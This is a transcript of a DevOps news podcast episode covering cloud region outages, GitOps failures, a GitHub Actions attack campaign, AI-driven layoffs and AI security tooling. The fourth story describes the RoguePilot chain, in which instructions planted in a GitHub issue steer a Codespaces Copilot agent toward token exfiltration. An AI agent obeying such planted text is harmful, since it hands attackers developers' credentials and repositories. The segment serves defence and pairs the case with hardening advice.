AWS Bahrain/UAE Data Center Issues Amid Iran Strikes, ArgoCD vs Flux GitOps Failures, GitHub Actions Hackerbot-Claw Attacks (Trivy), RoguePilot Codespaces Prompt Injection, Block “AI Remake” Layoffs, Claude Code Security

Transcript

This week is another reminder that the boundary

of ops keeps expanding. Sometimes the incident

trigger isn't a bad deploy. It's physical disruption

in a cloud region. Sometimes it isn't your app.

It's your GitOps control plane getting stuck.

Sometimes it isn't a vuln in prod. It's your

CI getting actively hunted. And sometimes it's

your company saying AI remake while expecting

the same reliability with fewer humans. All right,

let's get into it. Hey, I'm Brian Teller. I work

in DevOps and SRE, and I run Teller's Tech. This

is Ship It Weekly, where I filter the noise and

focus on what actually changes how we run infrastructure

and own reliability. Show notes and links are

on shipitweekly .fm. If the show's been useful,

follow it wherever you listen. Also, ratings

help way more than they should. Six main stories

today, then the lightning round, and then the

human closer. Story 1 is AWS flagging issues

in Bahrain and the UAE data centers amid Iran's

strikes, and what this means for regional resilience.

Story 2 is Argo CD to Flux and the specific Argo

CD failure mode that makes GitOps feel like a

pager generator. Story 3 is HackerBot Claw, an

automated campaign exploiting GitHub Actions

and Trivy getting hit as part of it story 4 is

rogue pilot a github code spaces co -pilot attack

chain it's basically prompt ejection meets real

credentials story 5 is block cutting 4 000 jobs

framed as an ai remake and why that's an ops

execution story story six is anthropic pushing

frontier cyber security capabilities for defenders

and what that means when these tools move from

scan to suggest fixes then the lightning round

then the human closer all right story one So

Reuters reported AWS flagged power and connectivity

issues tied to incidents at facilities in the

UAE and Bahrain amid the regional conflict. The

practical takeaway is simple. Multi -AZ is not

multi -region, and cloud outages now include

physical risk. If the region is degraded for

hours or days, the question becomes, can you

operate elsewhere and how fast can you decide?

A lot of teams say we're highly available, and

what they really mean is we can lose an AZ. That's

great, you should do that. But it's not the same

as losing an entire region's capacity, networking,

or connectivity to the outside world. This is

where a DR plan stops being a diagram and becomes

a decision tree. Here's how this bites real orgs.

Your apps might technically still run, but your

dependencies don't. Payments provider timeouts.

Queue backlogs. Outbound traffic gets weird.

Latency goes from fine to unusable. And suddenly

you are in the ugly space where nothing is fully

down, but everything is failing. That's also

where people make the wrong call. They wait too

long because it's partially working. Then failover

gets harder because data divergence grows and

backlogs pile up. Do this Monday. Pick one region

you rely on heavily and run this thought experiment.

Assume it's impaired for 48 hours. Who makes

the failover call? Not we would, a name or a

role. And what signals trigger it? Error rate?

Latency? Provider status? Customer impact? What's

the DNS plan? Do you use weighted routing? Failover

routing? Manual cutover? How long does it take?

What's the rollback plan? What's the data plan?

not the app plan. If your database is regional,

your app is regional. If your queue is regional,

your app is regional. If your identity system

is regional, your app is regional. Have you tested

this in the last year? Even a tabletop, even

a low -risk exercise, anything besides we totally

could if we had to. If you are in edge regions

or high -risk geos, you don't get to pretend

this is theoretical. Next up, story two. Story

two is GitOps pain. There's a great write -up

on migrating from Argo CD to Flux, and the best

part is the section literally titled The Problem

with Argo CD. The complaint is a specific failure

mode. A sync fails. Argo CD marks the app sync

failed, and then it can get stuck retrying the

failed state instead of progressing to the newer

commit that fixes it. The CRD ordering example

is the one everyone runs into at least once.

You push a commit that creates a custom resource.

The CRD isn't there yet, so sync fails. You push

a new commit, adding the CRD. And Argo CD can

keep banging its head against the old failed

commit. This is the moment where GitOps stops

feeling like declarative desired state and starts

feeling like a controller stuck in a loop that

needs a human rescue. The fastest way to hate

GitOps is getting paged by GitOps. And here's

the thing. Argo CD is good. Lots of teams run

it successfully. But the operational foot guns

are real. And if you haven't been burned yet,

you will be. GitOps tools are control planes.

When the control plane is wrong, it's not one

service down. It's your deployment mechanism

becoming the incident. So what do you actually

do with this story if you're not migrating to

Flux tomorrow? Do this Monday. If you run Argo

CD, make sure you have a runbook for sync failed

and won't progress. What do you do when it's

stuck on a bad desired state? What's the break

glass path that doesn't involve turning off all

automation? How do you handle CRDs and ordering

safely? Do you use sync waves? Do you split CRDs

into a separate app? do you pre -install them

whatever your pattern is write it down and standardize

it and make sure the on -call knows the recovery

moves manual sync refresh hard refresh prune

behavior deleting resources recreating app the

mechanics matter when you're under pressure now

on the flux side if you are considering flux

don't migrate your fleet first pick one low risk

service run it side by side Learn the failure

modes. Don't make this a religious war. Make

it an operational decision. Alright, story three.

This story is spicy in the way ops teams should

care about. Step Security documented an automated

campaign they call HackerBot Claw. It targeted

GitHub Actions workflows across major repos,

remote code execution in several targets, and

token theft, including a token with right permissions.

Then Trivy maintainers posted their own incident

report saying Trivy was attacked via GitHub Actions

as part of the same campaign. And they believe

the vulnerability came from a specific workflow

which they fixed. This is the your pipeline is

production story. Attackers are not waiting for

your app to have a bug. They are going after

the thing that can publish artifacts, ship releases,

and mint trust. CI is basically a skeleton key

that we keep leaving under the doormat. The real

reason this matters for DevOps is that CI feels

internal, but it's usually triggered by public

inputs. PR titles, PR descriptions, issues, forks,

external contributors, and if any of that can

reach privileged execution, you have an internet

-facing execution engine with credentials. Do

this Monday. Open your workflows and look for

common foot guns. Are you using pull request

target? If yes, do you fully understand which

code runs and what permissions it has? Are actions

pinned to commit SHAs or are you trusting tags?

Tags move, SHAs don't. Is GitHub token overprivileged?

Set default permissions to read -only and explicitly

grant what you need per job. Are secrets accessible

in contexts influenced by untrusted PRs? If untrusted

code can run in jobs with secrets, assume those

secrets are compromised eventually. Bonus hardening

that actually helps. Use OIDC to cloud providers

instead of long -lived cloud keys. Use environments

with required reviewers for deploy jobs. Separate

untrusted test pipeline from trusted published

deploy pipeline. If you do only one thing this

week, stop untrusted events from running privileged

steps. Okay, story four. this one is a perfect

bridge between agents are real and credentials

are real rogue pilot is an attack chain where

a malicious github issue can embed instructions

that get processed when a developer launches

a code space from that issue it's basically passive

prompt injection the attacker's content is the

prompt the scary part isn't the model said something

weird the scary part is the model can end up

operating in an environment that has real access

like a github token and the attacker's instructions

can steer what it does in the worst case it becomes

token exfiltration and repo takeover outcomes

this is exactly why agent boundaries are not

optional Untrusted text exists everywhere. Issues,

PRs, readmes, docs. If an agent reads it and

then can run commands, you need real trust boundaries.

Anything that reads issues is reading untrusted

input. Period. Do this Monday. If your org uses

Codespaces, Copilot -style agents, or anything

that can act, treat repo content as untrusted

input. Separate read context from act context.

Don't let the same agent both ingest and execute

without gates. Use least privileged tokens in

dev environments. A developer workspace should

not have a token that can publish releases or

modify workflows. If you rely on external issues

and PRs, tighten who can trigger what. And make

sure you have logging that captures tool actions,

not just chat. This story will keep repeating

across tools. It's a category, not a one -off.

All right, story five. So Block. If you're not

familiar, Block is the fintech company run by

Jack Dorsey. If the name sounds familiar, it's

because he's also the co -founder of Twitter

and one of the more influential figures in modern

tech platforms. Block used to be called Square.

It's the company behind things like Square Payments,

Cash App, and a bunch of fintech infrastructure

that powers small businesses and consumer payments.

So this isn't some random startup making headlines.

This is a large public tech company run by someone

who's been through multiple platform shifts already.

And now they're talking about what they're calling

an AI remake. Block is cutting around 4 ,000

jobs. This is not just an HR story for ops teams.

It's an execution story. Because the pattern

we're going to see everywhere is fewer humans,

higher output volume, same reliability expectations.

If AI increases code output, your safety net

has to scale too. That safety net is not hero

engineers. It's guardrails, ownership, and systems

that absorb change without constant babysitting.

Small teams move fast, only works if your brakes

work. Here's the practical ops angle. When teams

shrink, you lose redundancy. On -call rotations

get thinner. Specialists disappear. And then

an incident hits and the blast radius of we lost

that context is massive. So if leadership is

pushing AI productivity, the immediate question

is, what are we doing to preserve safety? Do

this Monday. If your org is in AI productivity

mode, is your main protected with required checks

that are actually required? Are releases gated

in a way that matches risk? Do you have a real

rollback muscle? Is ownership clear when output

volume increases? Also, watch the human metrics.

On -call load, mean time to restore, number of

pages per week. If those go up while headcount

goes down, your system is signaling that the

brakes are failing. One more main story before

the lightning round. Anthropic announced Claude

Code security in limited research preview. The

pitches scan code bases for vulnerabilities and

suggest targeted patches for human review. This

is the direction the industry is moving. Security

work becomes part of the normal coding loop.

And if it works well, it can reduce backlog and

reduce time to fix. But the operational lesson

is the same as every agentic tool. Suggestion

mode is safe. Autonomous change is where you

need boundaries. If it can open PRs, it needs

the same roles as a human. So do this Monday.

If you are adopting AI security tooling, start

with suggestion mode. No auto -merge. Require

human approval for changes. Keep audit trails

of tool actions, not just a chat transcript.

Also, measure it like a real tool. How many findings

were real? How many were noise? Did it actually

reduce time to fix? Did it introduce risky changes?

Treat it like CI. Scoped access. Clear ownership.

And guardrails that pre - prevent fixing by breaking

things. All right, time for the lightning round.

Too -quick -bigger -than -they -look stories.

DeepSeek reportedly withheld early access to

a new model from U .S. chipmakers while giving

Chinese firms early access. AI supply chains

are geopolitical now, and that impacts what you

can run where, and what best model even means.

Vercel wrote a great post on security boundaries

in Agentic Architectures. The core point? Most

agents run code with access to secrets, and without

explicit boundaries that become an incident generator.

Two CVE hits that are very DevOps SRE relevant.

CISA added VMware ARIA Operations CVE -2026 -22719

to the KEV catalog, meaning active exploitation.

If you run ARIA Ops, treat that as patch now.

And CVE -2026 -27825 and 27826 in MCP Atlassian

is nasty because it lives at the agent tolling

layer. SSRF to RCE style chain. Exactly why agent

toll chains need the same rigor as any other

production system. And one more quick hit. Cloud

Cowork Scheduled Tasks is the agents in boring

workflows story. Recurring automation is where

little mistakes turn into big messes. So you

want approvals, scope limits, and audit ability.

All right, human closer. Quick credit where it's

due. If this episode feels like everything is

a control plane now, that's not just my opinion.

Uwe Friedrichsen has been writing about the ironies

of automation for a while, and we used that framing

in a prior Ship It Weekly episode, too. The idea

is simple. Automation doesn't remove responsibility.

It concentrates it. And as systems get faster,

human oversight doesn't magically speed up. You

can see it across everything we've covered. Physical

disruption in a region forces human decisions

under pressure. GitOps getting stuck forces humans

to rescue the control plane. CI being actively

exploited is literally attack the automation.

Org changes, framed as AI remake, increase output

and reduce humans, which makes guardrails the

safety net. And AI security tooling is only a

win if boundaries and approvals stay intact.

So the takeaway is boring, but it's the job.

Guardrails are product work. You either build

breaks or you build faster incidents. All right,

that's it for this week of Ship It Weekly. AWS

issues in Bahrain and the UAE. Argo CD pain and

why Flux keeps coming up. GitHub actions being

actively hunted and Trivy getting hit. Rogue

pilot and prompt injection meet real credentials.

Blocks AI -driven layoffs as an execution risk

story. And Anthropic pushing AI security tooling

deeper into the dev workflow. Links and show

notes are on shipitweekly .fm. If this episode

was useful, hit follow or subscribe wherever

you listen. And share it with an ops friend who's

living in CI, GitOps, or AI everywhere right

now. I'm Brian, and I'll see you next week.

AWS Bahrain/UAE Data Center Issues Amid Iran Strikes, ArgoCD vs Flux GitOps Failures, GitHub Actions Hackerbot-Claw Attacks (Trivy), RoguePilot Codespaces Prompt Injection, Block “AI Remake” Layoffs, Claude Code Security

Watch this episode here

Chapters

Transcript

Catch This Episode

Host Commentary

Show Notes

More from Ship It Weekly

EKS Rollbacks, GitHub Actions Supply Chain Attacks, AI Agentjacking, CloudWatch Log Alarms, and Why Safety Nets Don’t Replace Ownership

containerd CRI Vulnerabilities, Datadog PostgreSQL HA on Kubernetes, AWS DevOps Agent with Datadog MCP Server, EKS Control Plane Egress, and Why Users Feel the Wait

PeopleSoft Zero-Day Exploited, npm v12 Install Script Changes, GitHub Agentic Tokens, Anthropic Model Risk, and Default Trust Breaking

CISA’s GitHub Leak, AI Root Cause Analysis, Copilot Agents, Claude Code in CI/CD, and Kubernetes Seccomp Risk

Get the next episode in your inbox